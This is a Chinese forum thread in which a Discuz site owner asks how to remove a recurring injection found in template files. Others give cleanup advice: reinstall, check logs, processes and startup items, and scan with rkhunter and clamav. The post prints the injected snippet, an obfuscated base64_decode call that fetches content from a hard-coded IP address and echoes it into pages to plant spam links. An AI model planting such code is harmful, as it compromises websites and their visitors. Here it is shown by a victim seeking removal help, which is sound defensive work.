大佬们，这个马在哪儿哪儿清除？

坐怀不乱西门庆

模版文件下多了这些

1. <!--{eval}-->
   
2. <!--
   
3. if(!$_SERVER['QUERY_STRING']){
   
4.         $vars = 'b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e';
   
5.         echo file_get_contents($vars("aHR0cDovLzE4My42MC4xMTEuMTczOjgwODAvbGluay9nYmsuaHRtbA=="));
   
6. }
   
7. -->
   
8. <!--{/eval}-->

复制代码

DZ论坛被挂黑链，同VPS另一个网站也被挂，root用户早已经改了端口号

您好，请联系您的程序人员检查一下网站代码是否存在漏洞，这边不是程序人员，无法协助您操作，请见谅！为了更好的为您提供优质的服务，烦请您在百忙之中抽空对该工单做出评价，感谢您的配合!

leaveoff

找个软件可以批量清除 。。。几秒就搞定了。。。

坐怀不乱西门庆

leaveoff 发表于 2018-1-4 13:25
找个软件可以批量清除 。。。几秒就搞定了。。。

删这行没问题而且很简单，不知道是从哪儿来的，删了再被加上

我是人

重装。

被挂rootkit的话，没有其他办法。。。

hxuf

你是怎么发现的

坐怀不乱西门庆

我是人 发表于 2018-1-4 13:48
重装。

被挂rootkit的话，没有其他办法。。。

我是说我早已经把自己的端口改了，挂马的人似乎不是通过root进去的

funders

看web日志是如何被黑的

坐怀不乱西门庆

删了又自动生成

Ruclinux

看服务项目里有没有可疑脚本或启动项
看进程里有没有可疑进程
安装个rkhunter进行扫描
安装个clamav进行扫描

坐怀不乱西门庆

Ruclinux 发表于 2018-1-4 18:54
看服务项目里有没有可疑脚本或启动项
看进程里有没有可疑进程
安装个rkhunter进行扫描

这两个有小白文档没？前两天恢复了镜像不到一天又被日了